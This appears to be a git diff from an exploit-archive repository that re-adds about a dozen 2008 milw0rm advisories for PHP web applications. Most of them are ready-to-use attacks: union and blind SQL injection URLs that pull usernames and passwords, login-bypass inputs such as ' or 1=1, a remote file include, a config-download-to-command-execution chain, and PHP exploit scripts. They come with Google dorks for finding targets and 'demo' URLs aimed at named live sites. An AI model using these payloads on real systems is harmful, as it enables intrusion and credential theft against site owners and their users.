-http://localhost/clipshare/channel_detail.php?chid=-1+union+select+1,concat(0x3a,username,0x3a,pwd),3+from+signup-- - -Demo : - -http://www.salsavidz.com/clipshare/channel_detail.php?chid=-1+union+select+1,concat(0x3a,username,0x3a,pwd),3+from+signup-- - -=================================================================================================================== -Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or:: -ALL www.Snakespc.com/SC >>>> Members -str0ke.....>>>>.....milw0rm -=================================================================================================================== - -# milw0rm.com [2008-11-15] +================================================================================================================== + SSSSS NN N AA K K EEEEE 
SSSSS TTTTTTTTT EEEEE AA MM MM + S N N N A A K K E S T E A A M M M M + SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M + S N N N A A K K E S T E A A M M M + SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M +===================================================SNAKES TEAM==================================================== ++ = += Script: clipShare Remote SQL Injection Vulnerability + ++ = +==============================================:::ALGERIAN HaCkEr:::=============================================== + = = = = + = = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = = + = = + = = ************ ::::::home : www.snakespc.com/sc::::::*************** = = + = = + = = :::::Mail: snakespc@gmail.com::::::: = = + = = + = script:http://www.clip-share.com = + = = + = channel_detail.php?chid= = + =================================== Snakespc ====================================== +D0rk: clipshare/channel_detail.php?chid= +Dork: Powered By SalSa Creations + +Exploit: + +http://localhost/clipshare/channel_detail.php?chid=-1+union+select+1,concat(0x3a,username,0x3a,pwd),3+from+signup-- + +Demo : + +http://www.salsavidz.com/clipshare/channel_detail.php?chid=-1+union+select+1,concat(0x3a,username,0x3a,pwd),3+from+signup-- + +=================================================================================================================== +Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or:: +ALL www.Snakespc.com/SC >>>> Members +str0ke.....>>>>.....milw0rm +=================================================================================================================== + +# milw0rm.com [2008-11-15] diff --git a/platforms/php/webapps/7130.php b/platforms/php/webapps/7130.php index 604abf5de..715678845 100755 --- a/platforms/php/webapps/7130.php +++ b/platforms/php/webapps/7130.php @@ -1,54 +1,54 @@ - - -# milw0rm.com [2008-11-15] + + +# milw0rm.com [2008-11-15] 
diff --git a/platforms/php/webapps/7131.txt b/platforms/php/webapps/7131.txt index 50da4c46b..89783d87d 100755 --- a/platforms/php/webapps/7131.txt +++ b/platforms/php/webapps/7131.txt 
@@ -1,39 +1,39 @@ -================================================================================================================== - SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM - S N N N A A K K E S T E A A M M M M - SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M - S N N N A A K K E S T E A A M M M - SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M -===================================================SNAKES TEAM==================================================== -+ = -= Script: yahoo answers Remote SQL Injection Vulnerability + -+ = -==============================================:::ALGERIAN HaCkEr:::=============================================== - = = = = - = = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = = - = = - = = ************ ::::::home : www.snakespc.com/sc::::::*************** = = - = = - = = :::::Mail: snakespc@gmail.com::::::: = = - = = - = Sript Demo:http://www.phpstore.info/product_info.php?products_id=163 = - = = - = www.phpstore.info = - =================================== Snakespc ====================================== - - -Exploit: - -http://localhost/index.php?cmd=4&id=-1+UNION SELECT 1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14,15-- - -Demo : - -http://phpstore.info/demos/yahooanswers/index.php?cmd=4&id=-1+UNION SELECT 1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14,15-- - -=================================================================================================================== -Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or:: -ALL www.Snakespc.com/SC >>>> Members -str0ke.....>>>>.....milw0rm -=================================================================================================================== - -# milw0rm.com [2008-11-16] +================================================================================================================== + SSSSS NN N AA K K 
EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM + S N N N A A K K E S T E A A M M M M + SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M + S N N N A A K K E S T E A A M M M + SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M +===================================================SNAKES TEAM==================================================== ++ = += Script: yahoo answers Remote SQL Injection Vulnerability + ++ = +==============================================:::ALGERIAN HaCkEr:::=============================================== + = = = = + = = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = = + = = + = = ************ ::::::home : www.snakespc.com/sc::::::*************** = = + = = + = = :::::Mail: snakespc@gmail.com::::::: = = + = = + = Sript Demo:http://www.phpstore.info/product_info.php?products_id=163 = + = = + = www.phpstore.info = + =================================== Snakespc ====================================== + + +Exploit: + +http://localhost/index.php?cmd=4&id=-1+UNION SELECT 1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14,15-- + +Demo : + +http://phpstore.info/demos/yahooanswers/index.php?cmd=4&id=-1+UNION SELECT 1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14,15-- + +=================================================================================================================== +Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or:: +ALL www.Snakespc.com/SC >>>> Members +str0ke.....>>>>.....milw0rm +=================================================================================================================== + +# milw0rm.com [2008-11-16] diff --git a/platforms/php/webapps/7133.txt b/platforms/php/webapps/7133.txt index a4385ab4b..532999f47 100755 --- a/platforms/php/webapps/7133.txt +++ b/platforms/php/webapps/7133.txt 
@@ -1,32 +1,32 @@ -=========================================================================================== -[-] Title : Multiple SQL Injection Vulnerability -[-] Software : Flosites Blog -[-] Vendor : www.flosites.com -[-] Date : 17 November 2008 (Indonesia) -[-] Author : Vrs-hCk -[-] Contact : d00r[at]telkom.net -[-] Blog : http://c0li.blogspot.com/ -=========================================================================================== - -[+] Google Dork - - "blog by flosites" - -[+] Exploit - - http://[site]/[path]/index.php?cat=-1 [SQL]/* - http://[site]/[path]/index.php?category=-1 [SQL]/* - -[+] Proof of Concept - - http://www.designaglow.com/blog/index.php?cat=-1+union+select+1,version(),3/* - http://www.designaglow.com/blog/index.php?category=-1+union+select+1,version(),3/* - -=========================================================================================== -[-] Greetz : - www.MainHack.com - www.ServerIsDown.org - #papuahacker crew - #nob0dy Crew @ DALnet - Paman, NoGe, OoN_Boy, H312Y, pizzyroot, xx_user, bL4Ck_3n91n3, culun_borneo, s3t4n, - Angela Chang, terbang_melayang, IrcMafia, loqsa, str0ke, em|nem, dkk ... 
-=========================================================================================== - -# milw0rm.com [2008-11-16] +=========================================================================================== +[-] Title : Multiple SQL Injection Vulnerability +[-] Software : Flosites Blog +[-] Vendor : www.flosites.com +[-] Date : 17 November 2008 (Indonesia) +[-] Author : Vrs-hCk +[-] Contact : d00r[at]telkom.net +[-] Blog : http://c0li.blogspot.com/ +=========================================================================================== + +[+] Google Dork + + "blog by flosites" + +[+] Exploit + + http://[site]/[path]/index.php?cat=-1 [SQL]/* + http://[site]/[path]/index.php?category=-1 [SQL]/* + +[+] Proof of Concept + + http://www.designaglow.com/blog/index.php?cat=-1+union+select+1,version(),3/* + http://www.designaglow.com/blog/index.php?category=-1+union+select+1,version(),3/* + +=========================================================================================== +[-] Greetz : + www.MainHack.com - www.ServerIsDown.org - #papuahacker crew - #nob0dy Crew @ DALnet + Paman, NoGe, OoN_Boy, H312Y, pizzyroot, xx_user, bL4Ck_3n91n3, culun_borneo, s3t4n, + Angela Chang, terbang_melayang, IrcMafia, loqsa, str0ke, em|nem, dkk ... +=========================================================================================== + +# milw0rm.com [2008-11-16] diff --git a/platforms/php/webapps/7134.txt b/platforms/php/webapps/7134.txt index 6972b25ef..1f1c9dca2 100755 --- a/platforms/php/webapps/7134.txt +++ b/platforms/php/webapps/7134.txt 
@@ -1,50 +1,50 @@ -|___________________________________________________ -| -| Wholesale ( track.php id) Remote SQL Injection Vulnerability -| -|___________________________________________________ -| -| -| Author: Hussin X -| -| Home : WwW.IQ-ty.CoM -| -| email: darkangel_g85@Yahoo.com -| -|___________________________________________________ -| -| script : http://www.phpstore.info/product_info.php?cPath=36_53&products_id=162 -| -| DorK : inurl:"track.php?id=" -|___________________________________________________ - -Exploit: -________ - - - -www.[target].com/Script/track.php?id=-2+union+select+concat(username,0x3e,password)+FROM+admin-- - - - -Demo -________ - -http://phpstore.info/demos/wholesale/track.php?id=-2+union+select+concat(username,0x3e,password)+FROM+admin-- - - - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC | -| -| My friends : DeViL iRaQ | IRAQ_JAGUR | Cyber-Zone | Sakab -| -| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | CraCkEr | G4N0K -|_____________________________________________________________________ - - - Im IRAQi | Im TrYaGi - -# milw0rm.com [2008-11-16] +|___________________________________________________ +| +| Wholesale ( track.php id) Remote SQL Injection Vulnerability +| +|___________________________________________________ +| +| +| Author: Hussin X +| +| Home : WwW.IQ-ty.CoM +| +| email: darkangel_g85@Yahoo.com +| +|___________________________________________________ +| +| script : http://www.phpstore.info/product_info.php?cPath=36_53&products_id=162 +| +| DorK : inurl:"track.php?id=" +|___________________________________________________ + +Exploit: +________ + + + +www.[target].com/Script/track.php?id=-2+union+select+concat(username,0x3e,password)+FROM+admin-- + + + +Demo +________ + +http://phpstore.info/demos/wholesale/track.php?id=-2+union+select+concat(username,0x3e,password)+FROM+admin-- + + + + +____________________________( Greetz 
)_________________________________ +| +| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC | +| +| My friends : DeViL iRaQ | IRAQ_JAGUR | Cyber-Zone | Sakab +| +| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | CraCkEr | G4N0K +|_____________________________________________________________________ + + + Im IRAQi | Im TrYaGi + +# milw0rm.com [2008-11-16] diff --git a/platforms/php/webapps/7136.txt b/platforms/php/webapps/7136.txt index b8a144cbf..f6256ac22 100755 --- a/platforms/php/webapps/7136.txt +++ b/platforms/php/webapps/7136.txt @@ -1,36 +1,36 @@ -************************(Bypass Config Download Vulnerability)***************** - -script: mxcamarchive 2.2 - -*************************************************************************** -download from:http://www.infireal.com/media/serve/106/mxcamarchive2.2.zip - -*************************************************************************** -........................................................................... -expl: - -http://site.com/path/archive/config.ini - -and login -http://site.com/path/admin - - -and add new web cam -and Description '
    ' -and save - - -now: -http://site.com/path/index.php?h=ls -la - -*************************************************** -*************************************************** - -Author: ahmadbady from http://www.deltahacking.net - -my mail: kivi_hacker666@yahoo.com - - -*************************************************** - -# milw0rm.com [2008-11-17] +************************(Bypass Config Download Vulnerability)***************** + +script: mxcamarchive 2.2 + +*************************************************************************** +download from:http://www.infireal.com/media/serve/106/mxcamarchive2.2.zip + +*************************************************************************** +........................................................................... +expl: + +http://site.com/path/archive/config.ini + +and login +http://site.com/path/admin + + +and add new web cam +and Description '
    ' +and save + + +now: +http://site.com/path/index.php?h=ls -la + +*************************************************** +*************************************************** + +Author: ahmadbady from http://www.deltahacking.net + +my mail: kivi_hacker666@yahoo.com + + +*************************************************** + +# milw0rm.com [2008-11-17] diff --git a/platforms/php/webapps/7138.txt b/platforms/php/webapps/7138.txt index 0642e5777..859dfa4a8 100755 --- a/platforms/php/webapps/7138.txt +++ b/platforms/php/webapps/7138.txt 
@@ -1,37 +1,37 @@ -E-topbiz AdManager 4 (group) Blind SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home : www.IQ-TY.com & www.TrYaG.cc - -___________________________________ - -script : http://e-topbiz.com/oprema/pages/admanager4.php - -Demo : -_______ -true & false - -http://e-topbiz.com/trafficdemos/admanager4/view.php?group=4+and%20substring(@@version,1,1)=4 -http://e-topbiz.com/trafficdemos/admanager4/view.php?group=4+and%20substring(@@version,1,1)=5 - -Version = 4 :) - - - - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC | -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab -| -| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K| -|_____________________________________________________________________ - - - Im IRAQi | Im TrYaGi - -# milw0rm.com [2008-11-17] +E-topbiz AdManager 4 (group) Blind SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home : www.IQ-TY.com & www.TrYaG.cc + +___________________________________ + +script : http://e-topbiz.com/oprema/pages/admanager4.php + +Demo : +_______ +true & false + +http://e-topbiz.com/trafficdemos/admanager4/view.php?group=4+and%20substring(@@version,1,1)=4 +http://e-topbiz.com/trafficdemos/admanager4/view.php?group=4+and%20substring(@@version,1,1)=5 + +Version = 4 :) + + + + + +____________________________( Greetz )_________________________________ +| +| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC | +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab +| +| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K| +|_____________________________________________________________________ + + + Im IRAQi | Im TrYaGi + +# milw0rm.com [2008-11-17] diff --git a/platforms/php/webapps/7140.txt b/platforms/php/webapps/7140.txt index 88c506fb3..b0535fcfb 100755 
--- a/platforms/php/webapps/7140.txt +++ b/platforms/php/webapps/7140.txt @@ -1,27 +1,27 @@ -\r\n\r\n", $argv[0]) and exit; - -$out = (preg_match('!^([^ ]+)$!sei', file_get_contents($argv[1] . '/pwd.txt'), $r) && preg_match('!^([^\|\|]+)\|\|!sei', base64_decode($r[1]), $pass)) - ? sprintf("Password : %s", base64_decode($pass[1])) : 'Exploitation failed'; - -printf("[~] %s \r\n\r\n", $out); - -?> - -# milw0rm.com [2008-11-17] +\r\n\r\n", $argv[0]) and exit; + +$out = (preg_match('!^([^ ]+)$!sei', file_get_contents($argv[1] . '/pwd.txt'), $r) && preg_match('!^([^\|\|]+)\|\|!sei', base64_decode($r[1]), $pass)) + ? sprintf("Password : %s", base64_decode($pass[1])) : 'Exploitation failed'; + +printf("[~] %s \r\n\r\n", $out); + +?> + +# milw0rm.com [2008-11-17] diff --git a/platforms/php/webapps/7143.txt b/platforms/php/webapps/7143.txt index 4378a6999..82bc409d3 100755 --- a/platforms/php/webapps/7143.txt +++ b/platforms/php/webapps/7143.txt 
@@ -1,32 +1,32 @@ -************************(remote file include)***************** - -script: phpfan 3.3.4 - -*************************************************************************** -download from:http://ishallnotcare.org/mint/pepper/tillkruess/downloads/tracker.php?url=http%3A//scriptsextra.ishallnotcare.org/phpfanbasic334.zip - -*************************************************************************** -............................................................................ -vul: - include_once $includepath .'/debug.php'; - -xpl: - -http://site.com/path/includes/init.php?includepath=shell? - -*************************************************** -*************************************************** - -Author: ahmadbady from http://www.deltahacking.net - -my mail: kivi_hacker666@yahoo.com - - -*************************************************** - -# milw0rm.com [2008-11-17] +************************(remote file include)***************** + +script: phpfan 3.3.4 + +*************************************************************************** +download from:http://ishallnotcare.org/mint/pepper/tillkruess/downloads/tracker.php?url=http%3A//scriptsextra.ishallnotcare.org/phpfanbasic334.zip + +*************************************************************************** +............................................................................ +vul: + include_once $includepath .'/debug.php'; + +xpl: + +http://site.com/path/includes/init.php?includepath=shell? + +*************************************************** +*************************************************** + +Author: ahmadbady from http://www.deltahacking.net + +my mail: kivi_hacker666@yahoo.com + + +*************************************************** + +# milw0rm.com [2008-11-17] diff --git a/platforms/php/webapps/7144.txt b/platforms/php/webapps/7144.txt index f36ff043c..13ccf0f27 100755 --- a/platforms/php/webapps/7144.txt +++ b/platforms/php/webapps/7144.txt 
@@ -1,37 +1,37 @@ -[~] powered by Jadu® Galaxies blind sql inj -[~] -[~] documents.php (categoryID) blind sql inj -[~] -[~]---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 17.11.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] my bug number now: 45 -[~] -[~] my target bug number: 100 -[~] -[~] N0T: a.q bide kpss calIscaktIm : ( ( -[~] -[~] ----------------------------------------------------------- - -exploit for demo: - -http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=4 ( true ) - -http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=3 ( false ) - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-17] +[~] powered by Jadu® Galaxies blind sql inj +[~] +[~] documents.php (categoryID) blind sql inj +[~] +[~]---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 17.11.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] my bug number now: 45 +[~] +[~] my target bug number: 100 +[~] +[~] N0T: a.q bide kpss calIscaktIm : ( ( +[~] +[~] ----------------------------------------------------------- + +exploit for demo: + +http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=4 ( true ) + +http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=3 ( false ) + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & all Muslim 
HaCkeRs +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-11-17] diff --git a/platforms/php/webapps/7146.txt b/platforms/php/webapps/7146.txt index 08a14f205..1e3f555f7 100755 --- a/platforms/php/webapps/7146.txt +++ b/platforms/php/webapps/7146.txt @@ -1,20 +1,20 @@ -############################################################################################### -[-] Simple Customer 1.2 Remort (Auth bypass) SQL Injection Vulnerability -[-] Discovered By : d3b4g -[-] Greetz : All my freind -################################################################################################ - Go to www.target.com[path]login.php - - Use following information to bypass login. - - Write any email Address as email address.It must to be in email format like somethin@something.com - - For exapmple letmein@inbox.com - - For password use ' or ' 1=1 - - Live demo [at] http://www.simplecustomer.com/demo/login.php --------------------------------------------- --------------------------------------------- - -# milw0rm.com [2008-11-17] +############################################################################################### +[-] Simple Customer 1.2 Remort (Auth bypass) SQL Injection Vulnerability +[-] Discovered By : d3b4g +[-] Greetz : All my freind +################################################################################################ + Go to www.target.com[path]login.php + + Use following information to bypass login. + + Write any email Address as email address.It must to be in email format like somethin@something.com + + For exapmple letmein@inbox.com + + For password use ' or ' 1=1 + + Live demo [at] http://www.simplecustomer.com/demo/login.php +-------------------------------------------- +-------------------------------------------- + +# milw0rm.com [2008-11-17] 
diff --git a/platforms/php/webapps/7147.txt b/platforms/php/webapps/7147.txt
index 690c04379..2b99b3778 100755
--- a/platforms/php/webapps/7147.txt
+++ b/platforms/php/webapps/7147.txt
@@ -1,54 +1,54 @@ -SaturnCMS (view) Blind SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home :IQ-SecuriTY > www.IQ-TY.com | TrYaG > www.TrYaG.cc - -Mail : darkangel_G85@yahoo.com - -___________________________________ - -script : http://www.saturncms.com/download - -Demo : -_______ - -http://demo.saturncms.com/gallery/web/view/22` - -true & false - -http://demo.saturncms.com/gallery/web/view/22+and+substring(@@version,1,1)=5 -http://demo.saturncms.com/gallery/web/view/22+and+substring(@@version,1,1)=4 -Version = 5 :) -Table -http://demo.saturncms.com/gallery/web/view/22+and+(SELECT 1 from mysql.user limit 0,1)=1 - - -Auth Bypass -_______ - -http://demo.saturncms.com/admin -Username : admin ' or 1=1 - -Password : milw0rm - - - - - - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC | -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab -| -| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K| -|_____________________________________________________________________ - - - IM IraQi | IM TrYaGI - -# milw0rm.com [2008-11-17] +SaturnCMS (view) Blind SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home :IQ-SecuriTY > www.IQ-TY.com | TrYaG > www.TrYaG.cc + +Mail : darkangel_G85@yahoo.com + +___________________________________ + +script : http://www.saturncms.com/download + +Demo : +_______ + +http://demo.saturncms.com/gallery/web/view/22` + +true & false + +http://demo.saturncms.com/gallery/web/view/22+and+substring(@@version,1,1)=5 +http://demo.saturncms.com/gallery/web/view/22+and+substring(@@version,1,1)=4 +Version = 5 :) +Table +http://demo.saturncms.com/gallery/web/view/22+and+(SELECT 1 from mysql.user limit 0,1)=1 + + +Auth Bypass +_______ + +http://demo.saturncms.com/admin +Username : admin ' or 1=1 + +Password : milw0rm + + + + + + + +____________________________( 
Greetz )_________________________________ +| +| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC | +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab +| +| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K| +|_____________________________________________________________________ + + + IM IraQi | IM TrYaGI + +# milw0rm.com [2008-11-17] diff --git a/platforms/php/webapps/7148.txt b/platforms/php/webapps/7148.txt index a1ffa3684..24c70a515 100755 --- a/platforms/php/webapps/7148.txt +++ b/platforms/php/webapps/7148.txt 
@@ -1,49 +1,49 @@ - - ######### - ############# - ################# - #################### - ####` `####` `#### - #####||| |||##### - ######||| |||###### - #######||| ||##|| |||####### - #######||||||##||||||####### - ############################ - ########################### - ######+++++++++++###### - #++++++++++++# - ___#++++++++++++# - _| #++++++++++++|___ - | ++++++++ | - |_ ++ _| - |_________+________| -######################################################################################################## -# Ultrastats exploit by eeee eeee e e # -# --------------------> 8 8 8 8 # -# 8eee 8eee 8eee8e # -# 88 88 88 8 # -# 88ee 88ee 88 8 ---> mail: hexdez@nm.ru # -######################################################################################################## -# -> Greetz to: # -# th0br0,magicwolf,_d4vid,ekaF,psychobarbie,d3hydr8,modda,#chaostreffpunkt # -######################################################################################################## -# -> Ultrastats all Versions?! Sql Injection # -# (Version 0.3.11 & 0.2.144 tested) # -######################################################################################################## -# -> Dork: inurl:"index.php?serverid=" # -######################################################################################################## -# -> Injection: # -# Querry -> index.php?serverid=2+union+select+0,1,concat(username,0x3a,password),3+from+stats_users-- # -# and watch the Source ;) # -# # -# -> Example: # -# -> v. 0.3.11: # -# ## -# http://cod2demo.ultrastats.org/index.php?serverid=2+union+select+0,1,concat(username,0x3a,password),3+from+stats_users-- -# -# -> v. 
0.2.144: -# -# http://www.ultrastats.x2server4u.de/index.php?serverid=6+union+select+0,1,concat(username,0x3a,password),3+from+stats_users-- -## - -# milw0rm.com [2008-11-17] + + ######### + ############# + ################# + #################### + ####` `####` `#### + #####||| |||##### + ######||| |||###### + #######||| ||##|| |||####### + #######||||||##||||||####### + ############################ + ########################### + ######+++++++++++###### + #++++++++++++# + ___#++++++++++++# + _| #++++++++++++|___ + | ++++++++ | + |_ ++ _| + |_________+________| +######################################################################################################## +# Ultrastats exploit by eeee eeee e e # +# --------------------> 8 8 8 8 # +# 8eee 8eee 8eee8e # +# 88 88 88 8 # +# 88ee 88ee 88 8 ---> mail: hexdez@nm.ru # +######################################################################################################## +# -> Greetz to: # +# th0br0,magicwolf,_d4vid,ekaF,psychobarbie,d3hydr8,modda,#chaostreffpunkt # +######################################################################################################## +# -> Ultrastats all Versions?! Sql Injection # +# (Version 0.3.11 & 0.2.144 tested) # +######################################################################################################## +# -> Dork: inurl:"index.php?serverid=" # +######################################################################################################## +# -> Injection: # +# Querry -> index.php?serverid=2+union+select+0,1,concat(username,0x3a,password),3+from+stats_users-- # +# and watch the Source ;) # +# # +# -> Example: # +# -> v. 0.3.11: # +# ## +# http://cod2demo.ultrastats.org/index.php?serverid=2+union+select+0,1,concat(username,0x3a,password),3+from+stats_users-- +# +# -> v. 0.2.144: +# +# http://www.ultrastats.x2server4u.de/index.php?serverid=6+union+select+0,1,concat(username,0x3a,password),3+from+stats_users-- +## + +# milw0rm.com [2008-11-17] 
diff --git a/platforms/php/webapps/7149.php b/platforms/php/webapps/7149.php
index 2e3096284..1b8204066 100755
--- a/platforms/php/webapps/7149.php
+++ b/platforms/php/webapps/7149.php
@@ -1,128 +1,128 @@ - ] - - - ===[ XPL ]=== - */ - -error_reporting(E_ALL); - $G4N0K = "JEc0TjBLID0gPDw8RU9HDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09". - "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCiAgICAgICAgICAgICAgICAg". - "ICAgICBfICAgICAgXyAgICAgICBfICAgICAgICAgIF8gICAgICBfICAgXyANCiAgICAgICAgICAg". - "ICAgICAgICAgIC8gXCAgICB8IHwgICAgIHwgfCAgICAgICAgLyBcICAgIHwgfCB8IHwNCiAgICAg". - "ICAgICAgICAgICAgICAgLyBfIFwgICB8IHwgICAgIHwgfCAgICAgICAvIF8gXCAgIHwgfF98IHwN". - "CiAgICAgICAgICAgICAgICAgICAvIF9fXyBcICB8IHxfX18gIHwgfF9fXyAgIC8gX19fIFwgIHwg". - "IF8gIHwNCiAgIElOIFRIRSBOQU1FIE9GIC9fLyAgIFxfXCB8X19fX198IHxfX19fX3wgL18vICAg". - "XF9cIHxffCB8X3wNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg". - "ICAgICAgICAgICAgICAgICANCg0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09". - "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQogICAgICAgICAgICAg". - "ICAgICAgICAgX19fXyAgIF8gIF8gICAgIF8gICBfICAgIF9fXyAgICBfICBfXw0KICAgICAgICAg". - "ICAgICAgICAgICAgLyBfX198IHwgfHwgfCAgIHwgXCB8IHwgIC8gXyBcICB8IHwvIC8NCiAgICAg". - "ICAgICAgICAgICAgICAgfCB8ICBfICB8IHx8IHxfICB8ICBcfCB8IHwgfCB8IHwgfCAnIC8gDQog". - "ICAgICAgICAgICAgICAgICAgIHwgfF98IHwgfF9fICAgX3wgfCB8XCAgfCB8IHxffCB8IHwgLiBc". - "IA0KICAgICAgICAgZVhwbG8hdCBCeSAgXF9fX198ICAgIHxffCAgIHxffCBcX3wgIFxfX18vICB8". - "X3xcX1wNCg0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09". - "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQoJVmlkZW9TY3JpcHQgPD0gNC4wLjEuNTAg". - "QWRtaW4gQ2hhbmdlIFBhc3N3b3JkIEV4cGxvaXQNCj09PT09PT09PT09PT09PT09PT09PT09PT09". - "PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KDQpF". - "T0c7DQplY2hvICI8cHJlPiIuJEc0TjBLLiI8L3ByZT4iOw0KJEZPUk0gPSAiPEZPUk0gYWN0aW9u". - "PVwiIi4kX1NFUlZFUlsiUEhQX1NFTEYiXS4iXCIgbWV0aG9kPVwiUE9TVFwiPiI7JEZPUk0uPSA8". - "PDxGRkYNCiAgICA8UCBzdHlsZT0id2lkdGg6IDMwMHB4O2NsZWFyOiBsZWZ0O21hcmdpbjogMDtw". - "YWRkaW5nOiA1cHggMCA4cHggMDtwYWRkaW5nLWxlZnQ6IDE1NXB4O2JvcmRlci10b3A6IDFweCBk". 
